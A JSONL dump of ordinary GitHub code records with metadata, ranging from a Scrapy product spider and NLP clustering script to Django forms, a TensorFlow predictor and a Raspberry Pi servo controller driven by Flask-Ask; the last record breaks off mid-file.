+{"seq_id": "20538236857", "text": "# -*- coding: utf-8 -*-\r\nfrom scrapy.spider import BaseSpider\r\nfrom scrapy.selector import HtmlXPathSelector\r\nfrom scrapy.http import Request\r\nfrom scrapy.utils.response import get_base_url\r\nfrom urlparse import urljoin\r\nfrom product_spiders.items import Product, ProductLoader\r\nfrom product_spiders.utils import extract_price\r\nfrom urlparse import urljoin as urljoin_rfc\r\nfrom scrapy import signals\r\nfrom scrapy.xlib.pydispatch import dispatcher\r\nfrom scrapy.exceptions import DontCloseSpider\r\n\r\n\r\nclass OncallmedicalsuppliesSpider(BaseSpider):\r\n name = u'oncallmedicalsupplies.co.uk'\r\n allowed_domains = ['www.oncallmedicalsupplies.co.uk']\r\n start_urls = [\r\n u'http://www.oncallmedicalsupplies.co.uk',\r\n ]\r\n #download_delay = 1\r\n\r\n def __init__(self, *args, **kwargs):\r\n super(OncallmedicalsuppliesSpider, self).__init__(*args, **kwargs)\r\n dispatcher.connect(self.process_subcategories, signals.spider_idle)\r\n\r\n self.subcategories = []\r\n\r\n def process_subcategories(self, spider):\r\n if spider.name == self.name:\r\n self.log(\"Spider idle. Processing subcategories\")\r\n url = None\r\n if self.subcategories:\r\n url = self.subcategories.pop(0)\r\n if url:\r\n r = Request(url, callback=self.parse_subcategories)\r\n self._crawler.engine.crawl(r, self)\r\n raise DontCloseSpider\r\n\r\n def parse(self, response):\r\n hxs = HtmlXPathSelector(response)\r\n base_url = get_base_url(response)\r\n # subcategories\r\n urls = hxs.select('//div[@class=\"nav-container\"]//ul[@class=\"nav-horizontal\"]/li[position() > 1 and position() < 7]//a/@href').extract()\r\n for url in urls:\r\n url = urljoin_rfc(base_url, url)\r\n if url not in self.subcategories:\r\n self.subcategories.append(url)\r\n #yield Request(urljoin_rfc(base_url, url), callback=self.parse_subcategories)\r\n\r\n brand_list = \"http://www.oncallmedicalsupplies.co.uk/brands/\"\r\n yield Request(brand_list, callback=self.parse_brand_list)\r\n\r\n def parse_brand_list(self, response):\r\n hxs = HtmlXPathSelector(response)\r\n base_url = get_base_url(response)\r\n\r\n urls = response.xpath('//ul[@id=\"manufacturer_list\"]//a/@href').extract()\r\n for url in urls:\r\n url = urljoin_rfc(base_url, url)\r\n if url not in self.subcategories:\r\n self.subcategories.append(url)\r\n\r\n\r\n def parse_subcategories(self, response):\r\n hxs = HtmlXPathSelector(response)\r\n base_url = get_base_url(response)\r\n # subcategories\r\n urls = hxs.select('//*[@id=\"narrow-by-list2\"]//a/@href').extract()\r\n for url in urls:\r\n url = urljoin_rfc(base_url, url)\r\n if url not in self.subcategories:\r\n self.subcategories.append(url)\r\n #yield Request(urljoin_rfc(base_url, url), callback=self.parse_subcategories)\r\n urls = hxs.select('//div[@class=\"category-description std\"]/table//a/@href').extract()\r\n for url in urls:\r\n url = urljoin_rfc(base_url, url)\r\n if url not in self.subcategories:\r\n self.subcategories.append(url)\r\n #yield Request(urljoin_rfc(base_url, url), callback=self.parse_subcategories)\r\n #pagination\r\n urls = hxs.select('//div[@class=\"pages\"]//a/@href').extract()\r\n for url in urls:\r\n yield Request(urljoin_rfc(base_url, url), callback=self.parse_subcategories)\r\n # products\r\n urls = hxs.select('//div[@class=\"category-products\"]//h2/a/@href').extract()\r\n for url in urls:\r\n yield Request(urljoin_rfc(base_url, url), callback=self.parse_product)\r\n\r\n def parse_product(self, response):\r\n hxs = HtmlXPathSelector(response)\r\n base_url = 
get_base_url(response)\r\n for url in response.xpath('//div[@class=\"grouped_mini_name\"]/a/@href').extract():\r\n yield Request(url, callback=self.parse_product)\r\n loader = ProductLoader(item=Product(), selector=hxs)\r\n name = hxs.select('//h1[@itemprop=\"name\"]/text()').extract()[0].strip()\r\n loader.add_value('url', response.url)\r\n loader.add_value('name', name)\r\n image_url = hxs.select('//img[@id=\"image\"]/@src').extract()\r\n if image_url:\r\n loader.add_value('image_url', urljoin(base_url, image_url[0]))\r\n identifier = response.xpath('//*[@id=\"product_addtocart_form\"]//input[@name=\"product\"]/@value').extract()[0].strip()\r\n price = 0\r\n availability = hxs.select('//span[@itemprop=\"availability\"]/@content').extract()\r\n if availability:\r\n if availability[0].strip() == 'out_of_stock':\r\n loader.add_value('stock', 0)\r\n else:\r\n price = response.xpath('//span[@id=\"price-excluding-tax-%s\"]//text()' %identifier).extract()\r\n if price:\r\n price = extract_price(price[0])\r\n else:\r\n return\r\n loader.add_value('price', price)\r\n category = hxs.select('//div[@class=\"breadcrumbs\"]/ul/li[2]/a/text()').extract()\r\n if category:\r\n loader.add_value('category', category[-1])\r\n sku = hxs.select('//span[@itemprop=\"identifier\"]/text()').extract()[0]\r\n loader.add_value('sku', sku)\r\n loader.add_value('identifier', identifier)\r\n brand = hxs.select('//span[@itemprop=\"brand\"]/text()').extract()\r\n if brand:\r\n loader.add_value('brand', brand[0])\r\n yield loader.load_item()\r\n", "repo_name": "Godsoo/scraping", "sub_path": "e-commerce/CompetitorMonitor/product_spiders/spiders/farla/oncallmedicalsupplies.py", "file_name": "oncallmedicalsupplies.py", "file_ext": "py", "file_size_in_byte": 5630, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "scrapy.spider.BaseSpider", "line_number": 15, "usage_type": "name"}, {"api_name": "scrapy.xlib.pydispatch.dispatcher.connect", "line_number": 25, "usage_type": "call"}, {"api_name": "scrapy.xlib.pydispatch.dispatcher", "line_number": 25, "usage_type": "name"}, {"api_name": "scrapy.signals.spider_idle", "line_number": 25, "usage_type": "attribute"}, {"api_name": "scrapy.signals", "line_number": 25, "usage_type": "name"}, {"api_name": "scrapy.http.Request", "line_number": 36, "usage_type": "call"}, {"api_name": "scrapy.exceptions.DontCloseSpider", "line_number": 38, "usage_type": "name"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 41, "usage_type": "call"}, {"api_name": "scrapy.utils.response.get_base_url", "line_number": 42, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 46, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 52, "usage_type": "call"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 55, "usage_type": "call"}, {"api_name": "scrapy.utils.response.get_base_url", "line_number": 56, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 60, "usage_type": "call"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 66, "usage_type": "call"}, {"api_name": "scrapy.utils.response.get_base_url", "line_number": 67, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 71, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 77, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 84, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 84, 
"usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 88, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 88, "usage_type": "call"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 91, "usage_type": "call"}, {"api_name": "scrapy.utils.response.get_base_url", "line_number": 92, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 94, "usage_type": "call"}, {"api_name": "product_spiders.items.ProductLoader", "line_number": 95, "usage_type": "call"}, {"api_name": "product_spiders.items.Product", "line_number": 95, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 101, "usage_type": "call"}, {"api_name": "product_spiders.utils.extract_price", "line_number": 111, "usage_type": "call"}]}
+{"seq_id": "26736930107", "text": "import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.tokenize import sent_tokenize\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport re\r\nfrom collections import Counter \r\ndef url_to_string(url):\r\n res = requests.get(url)\r\n html = res.text\r\n soup = BeautifulSoup(html, 'html5lib')\r\n for script in soup([\"script\", \"style\", 'aside']):\r\n script.extract()\r\n return \" \".join(re.split(r'[\\n\\t]+', soup.get_text()))\r\n\r\n#ny_bb = url_to_string('https://www.nytimes.com/2018/08/13/us/politics/peter-strzok-fired-fbi.html?hp&action=click&pgtype=Homepage&clickSource=story-heading&module=first-column-region®ion=top-news&WT.nav=top-news')\r\n\r\np_num=1\r\n\r\nlist_file_path = [r\"D:\\DS\\NLP\\Seminar\\Code Example\\Targil2\\Data Of Articles\\articles1.csv\",r\"D:\\DS\\NLP\\Seminar\\Code Example\\Targil2\\Data Of Articles\\articles2.csv\",r\"D:\\DS\\NLP\\Seminar\\Code Example\\Targil2\\Data Of Articles\\articles3.csv\"]\r\n\r\ndata = pd.DataFrame()\r\nfor i in list_file_path:\r\n temp_data = pd.read_csv(i)\r\n if data.shape[0] == 0:\r\n data = temp_data\r\n else:\r\n data = data.append(temp_data)\r\n \r\n\r\nmask_url_data = data['url'].notnull()\r\n\r\nurl_data = data.loc[mask_url_data,'url']\r\nurl_data = url_data.iloc[:20]\r\nnews_list = list()\r\nfor url in url_data:\r\n text = url_to_string(url)\r\n news_list.append(sent_tokenize(text))\r\n\r\n\r\n#%% Word To Vec\r\n#Input to the gensim's Word2Vec can be a list of sentences or list of words or list of list of sentences.\r\nfrom gensim.models import Word2Vec\r\nsentences = news_list\r\nmodel = Word2Vec(sentences, size=100, window=5, min_count=3, workers=4)\r\n\r\nvectors = model.wv\r\n#%%Plot Word Vectors Using PCA\r\nfrom sklearn.decomposition import PCA\r\n\r\nX = model[model.wv.vocab]\r\npca = PCA(n_components=2)\r\nresult = pca.fit_transform(X)\r\nplt.figure(p_num)\r\nplt.scatter(result[:, 0], result[:, 1])\r\n#words = list(model.wv.vocab)\r\nwords = [i for i in range(0,len(sentences))]\r\nfor i, word in enumerate(words):\r\n\tplt.annotate(word, xy=(result[i, 0], result[i, 1]))\r\nplt.show()\r\np_num+=1\r\n\r\n#%% cluster\r\nvocab_list = words\r\nX = model[model.wv.vocab]\r\n\r\nfrom nltk.cluster import KMeansClusterer\r\nimport nltk\r\nnum_clusters=2\r\nkclusterer = KMeansClusterer(num_clusters, distance=nltk.cluster.util.cosine_distance, repeats=25)\r\nassigned_clusters = kclusterer.cluster(X, assign_clusters=True)\r\nprint (assigned_clusters)\r\n\r\ncluster_dataframe = pd.DataFrame({'cluster':assigned_clusters},index = vocab_list)\r\n\r\nmask = cluster_dataframe['cluster']==0\r\n\r\ncluster_dataframe[mask]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "talrozner/my-repository", "sub_path": "NLP/test/Pitaron - Cluster Of News.py", "file_name": "Pitaron - Cluster Of News.py", "file_ext": "py", "file_size_in_byte": 2608, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 13, "usage_type": "call"}, {"api_name": "re.split", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "nltk.tokenize.sent_tokenize", "line_number": 40, 
"usage_type": "call"}, {"api_name": "gensim.models.Word2Vec", "line_number": 47, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "nltk.cluster.KMeansClusterer", "line_number": 72, "usage_type": "call"}, {"api_name": "nltk.cluster", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 76, "usage_type": "call"}]}
+{"seq_id": "2165582588", "text": "\"\"\"\n\nUsage:\n scripts/oneoff/fix-agreement-extensions.py [--dry-run]\n\"\"\"\nimport sys\nsys.path.insert(0, '.')\n\nimport os\nimport re\n\nimport magic\nfrom docopt import docopt\n\nfrom dmapiclient import DataAPIClient\nfrom dmutils.s3 import S3\nfrom dmscripts.env import get_api_endpoint_from_stage\n\n\ndef get_all_pdfs(download_directory):\n for root, subfolder, files in os.walk(download_directory):\n for filename in files:\n if filename.endswith('.pdf') and not filename.startswith('2015-11-'):\n yield os.path.join(root, filename)\n\n\ndef get_filetype(path):\n return magic.from_file(path, mime=True)\n\n\ndef is_empty(path):\n stat = os.stat(path)\n return stat.st_size == 0\n\n\ndef get_supplier_id_from_path(path):\n match = re.search(r'/(\\d+)/', path)\n if not match:\n raise ValueError(\"Could not find supplier ID in path {}\".format(path))\n return match.group(1)\n\n\ndef handle_path(client, bucket, dry_run, path):\n if is_empty(path):\n show_contact_details(client, dry_run, path)\n else:\n filetype = get_filetype(path)\n if filetype != b\"application/pdf\":\n update_file_extension(client, bucket, dry_run, path, filetype)\n\n\ndef show_contact_details(client, dry_run, path):\n supplier_id = get_supplier_id_from_path(path)\n if dry_run:\n print(\"Empty file for {} - {}\".format(supplier_id, os.path.basename(path)))\n else:\n supplier = client.get_supplier(supplier_id)['suppliers']\n declaration = client.get_supplier_declaration(supplier_id, 'g-cloud-7')\n print(\n \"Empty file for {}, {}, {}, {}\".format(\n supplier_id,\n supplier['name'],\n declaration['declaration'].get('SQ1-2b', \"none\"),\n supplier['contactInformation'][0]['email']))\n\n\ndef get_correct_file_extension(filetype):\n extension = {\n b\"application/zip\": \"zip\",\n b\"image/png\": \"png\",\n b\"image/jpeg\": \"jpg\",\n b'application/vnd.openxmlformats-officedocument.wordprocessingml.document': 'docx',\n }.get(filetype)\n if not extension:\n raise ValueError(\"Unknown file type: {}\".format(filetype))\n return extension\n\n\ndef get_path_in_s3(path):\n return \"{}/{}\".format('g-cloud-7', path.split('/g-cloud-7/')[1])\n\n\ndef update_file_extension(client, bucket, dry_run, path, filetype):\n supplier_id = get_supplier_id_from_path(path)\n extension = get_correct_file_extension(filetype)\n path_in_s3 = get_path_in_s3(path)\n prefix, suffix = os.path.splitext(path_in_s3)\n new_path = \"{}.{}\".format(prefix, extension)\n if dry_run:\n print(\n \"Not copying {} to {} for supplier {}\".format(\n path_in_s3, new_path, supplier_id))\n else:\n print(\n \"Copying {} to {} for supplier {} filetype {}\".format(\n path_in_s3, new_path, supplier_id, filetype))\n bucket.bucket.copy_key(\n new_path,\n src_bucket_name=bucket.bucket_name,\n src_key_name=path_in_s3,\n metadata={'Content-Type': filetype.decode('utf-8')},\n preserve_acl=True,\n )\n client.register_framework_agreement_returned(\n supplier_id,\n 'g-cloud-7',\n 'script: fix incorrect extension'\n )\n\n\ndef get_bucket_name(stage):\n return 'digitalmarketplace-agreements-{0}-{0}'.format(stage)\n\nif __name__ == '__main__':\n arguments = docopt(__doc__)\n\n stage = arguments['']\n api_token = arguments['']\n download_directory = arguments['']\n dry_run = arguments['--dry-run']\n\n api_url = get_api_endpoint_from_stage(stage)\n\n if dry_run:\n client = None\n bucket = None\n else:\n client = DataAPIClient(api_url, api_token)\n bucket = S3(get_bucket_name(stage))\n\n for path in get_all_pdfs(download_directory):\n handle_path(client, 
bucket, dry_run, path)\n", "repo_name": "risicle/digitalmarketplace-scripts", "sub_path": "scripts/oneoff/fix-agreement-extensions.py", "file_name": "fix-agreement-extensions.py", "file_ext": "py", "file_size_in_byte": 3980, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "32", "api": [{"api_name": "sys.path.insert", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "magic.from_file", "line_number": 28, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 32, "usage_type": "call"}, {"api_name": "re.search", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "docopt.docopt", "line_number": 115, "usage_type": "call"}, {"api_name": "dmscripts.env.get_api_endpoint_from_stage", "line_number": 122, "usage_type": "call"}, {"api_name": "dmapiclient.DataAPIClient", "line_number": 128, "usage_type": "call"}, {"api_name": "dmutils.s3.S3", "line_number": 129, "usage_type": "call"}]}
+{"seq_id": "69986959133", "text": "import os\nimport platform\n\n_scale = {'kB': 1024, 'mB': 1024*1024,\n 'KB': 1024, 'MB': 1024*1024}\n\ndef resident():\n if platform.system() == 'Windows':\n from wmi import WMI\n w = WMI('.')\n result = w.query(\"SELECT WorkingSet FROM Win32_PerfRawData_PerfProc_Process WHERE IDProcess=%d\" % os.getpid())\n return int(result[0].WorkingSet)\n else:\n with open('/proc/%d/status' % os.getpid()) as f:\n v = f.read()\n i = v.index('VmRSS:')\n v = v[i:].split(None, 3)\n #assert len(v) == 3, v\n return float(v[1]) * _scale[v[2]]\n", "repo_name": "p2pool/p2pool", "sub_path": "p2pool/util/memory.py", "file_name": "memory.py", "file_ext": "py", "file_size_in_byte": 592, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1095, "dataset": "github-code", "pt": "32", "api": [{"api_name": "platform.system", "line_number": 8, "usage_type": "call"}, {"api_name": "wmi.WMI", "line_number": 10, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "31321871179", "text": "# -*- coding: UTF-8 -*-\nimport re\nimport numpy as np\nimport scipy as sp\nimport scipy.stats\n\n\"\"\"parse percentage string to float\"\"\"\ndef percentage_to_float(percentage_str):\n\tif percentage_str is None:\n\t\treturn 0.0\n\treturn float(re.search(r'[\\d\\.]+', percentage_str).group()) * 0.01\n\n\"\"\"compute data's mean confidence interval,\nmean difference will also be returned.\"\"\"\ndef mean_confidence_interval(data, confidence=0.95):\n\ta = 1.0 * np.array(data)\n\tn = len(a)\n\tif n < 1: return -1, -1, -1\n\tm, se = np.mean(a), scipy.stats.sem(a)\n\th = se * sp.stats.t._ppf((1 + confidence) / 2.0, n-1)\n\treturn m, m-h, m+h\n\n\"\"\"self defined loss function\"\"\"\ndef mean_loss_percentage(ground_truth, predictions):\n\treturn np.mean(np.abs((ground_truth - predictions) / predictions))", "repo_name": "hezudaopp/used_car_prediction", "sub_path": "utils/math_utils.py", "file_name": "math_utils.py", "file_ext": "py", "file_size_in_byte": 757, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "re.search", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 19, "usage_type": "call"}, {"api_name": "scipy.stats.sem", "line_number": 19, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 19, "usage_type": "attribute"}, {"api_name": "scipy.stats.t._ppf", "line_number": 20, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "26024898045", "text": "import os\r\nfrom python_speech_features import mfcc\r\nimport scipy.io.wavfile as wav\r\nimport numpy as np\r\nimport pickle\r\n\r\ndirectory = os.getcwd() + \"/features\"\r\nf = open(\"features.dmp\", \"wb\")\r\ni = 0\r\n\r\nfor folder in os.listdir(directory):\r\n print(folder, end=' ')\r\n i+=1\r\n if i == 11: \r\n break\r\n for file in os.listdir(directory+\"/\"+folder):\r\n (rate, sig) = wav.read(directory+\"/\"+folder+\"/\"+file)\r\n mfcc_feat = mfcc(sig, rate, winlen=0.02, winstep=0.01, numcep=15,nfft = 1200, appendEnergy=False) \r\n covariance = np.cov(np.matrix.transpose(mfcc_feat))\r\n mean_matrix = mfcc_feat.mean(0)\r\n feature = (mean_matrix , covariance , i)\r\n pickle.dump(feature , f)\r\n print(\"--- done ({}/10)\".format(i))\r\nf.close()\r\nprint(\"---- feature dump finished ----\")", "repo_name": "prateekbose/Music-Genre-Classification", "sub_path": "feature_dump.py", "file_name": "feature_dump.py", "file_ext": "py", "file_size_in_byte": 812, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.getcwd", "line_number": 7, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 11, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 16, "usage_type": "call"}, {"api_name": "scipy.io.wavfile.read", "line_number": 17, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 17, "usage_type": "name"}, {"api_name": "python_speech_features.mfcc", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.cov", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.matrix.transpose", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "22380760325", "text": "'''\nForms\n'''\nfrom django import forms\nfrom .models import Comment, Post\n\n\nclass CommentForm(forms.ModelForm):\n '''\n Form for user to leave comments to the post\n '''\n class Meta:\n '''\n Comment only\n '''\n model = Comment\n fields = ('body',)\n labels = {'body': 'Comment:'}\n\n\nclass CreatePostForm(forms.ModelForm):\n '''\n Create new post\n '''\n\n class Meta:\n '''\n Form details\n '''\n model = Post\n fields = ('title', 'country', 'excerpt', 'featured_image', 'content', )\n labels = {'excerpt': 'Short Description'}\n", "repo_name": "kkwong44/travelogue", "sub_path": "blog/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.forms.ModelForm", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 8, "usage_type": "name"}, {"api_name": "models.Comment", "line_number": 16, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 21, "usage_type": "name"}, {"api_name": "models.Post", "line_number": 30, "usage_type": "name"}]}
+{"seq_id": "31215379290", "text": "import random\nimport os\nimport numpy as np\nimport tensorflow as tf\n\nfrom google.cloud import storage\nfrom PIL import Image\n\nbucket_name = 'nugaskuy' \ndataset_dir = 'dataset'\n\n\n# def load_and_run_tflite_model(input_data):\n# # Load the TFLite model\n# interpreter = tf.lite.Interpreter(model_path='https://storage.googleapis.com/nugaskuy/modelv2.tflite')\n# interpreter.allocate_tensors()\n\n# # Get input and output details\n# input_details = interpreter.get_input_details()\n# output_details = interpreter.get_output_details()\n\n# # Set input data\n# interpreter.set_tensor(input_details[0]['index'], input_data)\n\n# # Run the interpreter\n# interpreter.invoke()\n\n# # Get the output results\n# output_data = interpreter.get_tensor(output_details[0]['index'])\n\n# return output_data\n\ndef get_recommended_images(category, num_images):\n # Membuat objek storage client\n storage_client = storage.Client()\n\n # Mendapatkan objek bucket\n bucket = storage_client.get_bucket(bucket_name)\n\n # Mendapatkan daftar file dalam direktori kategori di bucket\n category_dir = os.path.join(dataset_dir, category)\n blobs = bucket.list_blobs(prefix=category_dir + '/')\n\n # Mengambil nama file dari daftar blobs\n image_files = [blob.name for blob in blobs]\n\n # Jika ada lebih sedikit gambar daripada yang diminta\n num_images = min(num_images, len(image_files))\n\n # Memilih gambar secara acak\n recommended_images = random.sample(image_files, num_images)\n\n # Mengembalikan daftar URL publik untuk gambar yang direkomendasikan\n return [f\"https://storage.googleapis.com/{bucket_name}/{image_file}\" for image_file in recommended_images]\n # return recommended_images\n\ndef load_and_predict(image):\n img_size = 224\n model = tf.keras.models.load_model('gs://nugaskuy/model.h5')\n\n try:\n # Setup Image untuk kebutuhan prediksi\n img = Image.open(image)\n img = img.convert(\"RGB\")\n img = img.resize((img_size, img_size))\n img_array = np.array(img) / 255.0\n img_array = img_array[np.newaxis, ...]\n img_array = img_array.astype(np.float32)\n\n # Melakukan prediksi\n# prediction = load_and_run_tflite_model(img_array)\n prediction = model.predict(img_array)\n predicted_class = np.argmax(prediction)\n\n categories = [\"logaritma\", \"spldv\", \"integral\", \"pertidaksamaan\", \"eksponen\"]\n # Ubah class menjadi categorie\n predict_categories = categories[predicted_class]\n\n return predicted_class, predict_categories\n\n except OSError:\n return None, None\n", "repo_name": "ZamIzzudin/nugaskuy-be-flask", "sub_path": "controllers/logic.py", "file_name": "logic.py", "file_ext": "py", "file_size_in_byte": 2613, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "google.cloud.storage.Client", "line_number": 35, "usage_type": "call"}, {"api_name": "google.cloud.storage", "line_number": 35, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "random.sample", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 59, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 63, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, 
{"api_name": "numpy.newaxis", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 73, "usage_type": "call"}]}
+{"seq_id": "2891376692", "text": "#!/usr/bin/env python\n\"\"\"Some test application\n\"\"\"\nfrom config import Config\nfrom engine import py_engine\nfrom localtime import py_now_local\n\n\ndef main():\n conf = Config()\n result = py_engine(conf.content)\n print(py_now_local())\n print(result)\n print()\n print(\"The question in config file was:\", result[\"response\"][\"the_question_was\"])\n print(\"Response:\", result[\"response\"][\"answer\"])\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "abilian/cythonplus-sandbox", "sub_path": "advanced_containers/demo/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 447, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "32", "api": [{"api_name": "config.Config", "line_number": 10, "usage_type": "call"}, {"api_name": "engine.py_engine", "line_number": 11, "usage_type": "call"}, {"api_name": "localtime.py_now_local", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "28090481692", "text": "from datetime import datetime\nimport datetime\nfrom astral.sun import sun\nfrom astral import LocationInfo\n\nfrom pysolar.solar import*\n\nimport RPi.GPIO as GPIO\nimport pigpio\nimport time\n\nfrom flask import Flask\nfrom flask_ask import Ask, statement, convert_errors\nimport logging\n\nfrom multiprocessing import Process, Value\n\nimport requests\n\nGPIO.setmode(GPIO.BCM)\n\n#LimitSwitchShut = 16\n#LimitSwitchOpen = 12\n#GPIO.setup(LimitSwitchShut, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n#GPIO.setup(LimitSwitchOpen, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\nservo = 23\n#using pigpio for accurate hardware based timing rather than software generated which is susceptible to jitter\n\npwm = pigpio.pi() \npwm.set_mode(servo, pigpio.OUTPUT)\npwm.set_PWM_frequency( servo, 50 )\n\ndef get_elevation():\n date = datetime.datetime.now()\n LAT = \"REMOVED FOR PRIVACY\"\n LON = \"REMOVED FOR PRIVACY\"\n location = LocationInfo(\"Home\",\"England\",\"GMT\",LAT,LON)\n \n sun_times = sun(location.observer, date = date)\n\n dawn=sun_times[\"dawn\"]\n dusk=sun_times[\"dusk\"]\n dawn_elevation=get_altitude(LAT,LON,dawn)\n dusk_elevation=get_altitude(LAT,LON,dusk)\n #print(dawn_elevation)\n\n now = datetime.datetime.now(datetime.timezone.utc)\n #now=datetime.datetime(2007,2,18,12,13,1,190320,tzinfo=datetime.timezone.utc)\n current_elevation = get_altitude(LAT,LON,now)\n return current_elevation, dawn_elevation, dusk_elevation\n\napp = Flask(__name__)\nask = Ask(app, '/')\n\n#logging.getLogger(\"flask_ask\").setLevel(logging.DEBUG)\n\n@ask.intent('CONTROL_Intent', mapping={'status': 'status'})\ndef gpio_control(status):\n if status == \"open\":\n \n pwm.set_servo_pulsewidth( servo, 2500 ) ;\n time.sleep(2)\n pwm.set_PWM_dutycycle(servo,0);\n #else:\n #pwm.set_PWM_dutycycle(servo, 0);\n if status == 'close':\n pwm.set_servo_pulsewidth( servo, 500 ) ;\n time.sleep(2)\n\n#else:\n pwm.set_PWM_dutycycle(servo, 0);\n #GPIO.setup(pinNum, GPIO.OUT)\n #if status in ['on', 'high']: GPIO.output(pinNum, GPIO.HIGH)\n #if status in ['off', 'low']: GPIO.output(pinNum, GPIO.LOW)\n #return statement('Turning pin {} {}'.format(pin, status))\n #print(status)\n #time.sleep(1)\n return statement('Sensing and IoT is super epic.')\n\"\"\"\ndef automate(status):\n while True:\n if status == \"close\":\n status.value = True\n if status == 